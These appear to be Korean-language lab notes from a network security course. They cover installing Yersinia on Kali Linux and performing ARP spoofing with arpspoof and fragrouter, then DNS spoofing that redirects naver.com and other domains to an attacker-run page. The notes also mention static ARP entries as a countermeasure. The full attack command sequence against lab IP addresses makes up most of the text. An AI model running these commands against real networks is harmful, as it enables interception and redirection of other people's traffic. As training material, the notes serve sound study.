https://www.kali.org/tools/yersinia/
- 설치(yersinia 빠르게 새로 받는법)
https://http.kali.org/README?mirrorstats <==== 레포 상태 확인
vi /etc/apt/source.list
기존내용 주석
https://kali.download/kali 를 적용함
apt-get update
apt remove --auto-remove yersinia
apt purge --auto-remove yersinia
git clone https://github.com/tomac/yersinia /opt/yersinia
apt install autoconf libgtk-3-dev libnet1-dev libgtk2.0-dev libpcap-dev -y
cd /opt/yersinia
./autogen.sh
./configure --with-gtk
make
make install
실행: yersinia -G
정상 컴퓨터
내컴퓨터 → GW → internet
arpspoof일경우
내컴퓨터 → 공격자 PC → GW → internet
- 공격 방법
- 칼리 100.100.100.200 (공격서버)
서버 100.100.100.10- 칼리
arpspoof -i eth0 -t 100.100.100.10 100.100.100.254& (target이 100.100.100.10 , GW를 적은 이유는 외부로 나가기 위해 반드시 거쳐가는 IP이기에=나가는 경로이기만 하면 됨)
공격 서버(arpspoof 공격 시작)
본서버(mini)
arp -s 10.10.10.254 [mac주소]
arp -a 로 확인
삭제: arp -d 10.10.10.254
- 대부분의 스푸핑은 자동으로 잡히게 되는 내용을 중간에 끼워넣어서 변조 하게 되므로 고정으로 바꿔주는 대책을 활용함
arpspoof -i eth0 -t 20.20.20.20 20.20.20.254
fragrouter -B1 (IP포워딩)
vi dns
20.20.20.200 www.sevas10.com
20.20.20.200 www.sevas20.com
20.20.20.200 .sevas30.com
20.20.20.200 www.naver.com
20.20.20.200 .centos.org
네이버의 IP가 공격자가 설정한 IP로 나옴
- 모든 공격이 100% 성공하지는 않음, 168.126.63.1에서도 찾지 못할 경우, 공격자가 설정해놓은 index.html화면이 뜸
홈페이지 변경
service apache2 restart
vi /var/www/html/index.html
웹사용코드
<meta charset="UTF-8">
<marquee bgcolor="red">
<font size=10 color=black>
공격 성공
</font></marguee>
- 본 서버에서 naver.com에 접속하였으나 공격자가 설정한 100.100.100.200 사이트가 나오는 모습 ⇒ 결과적으론 인터넷 연결(외부로 나가는 것) 실패임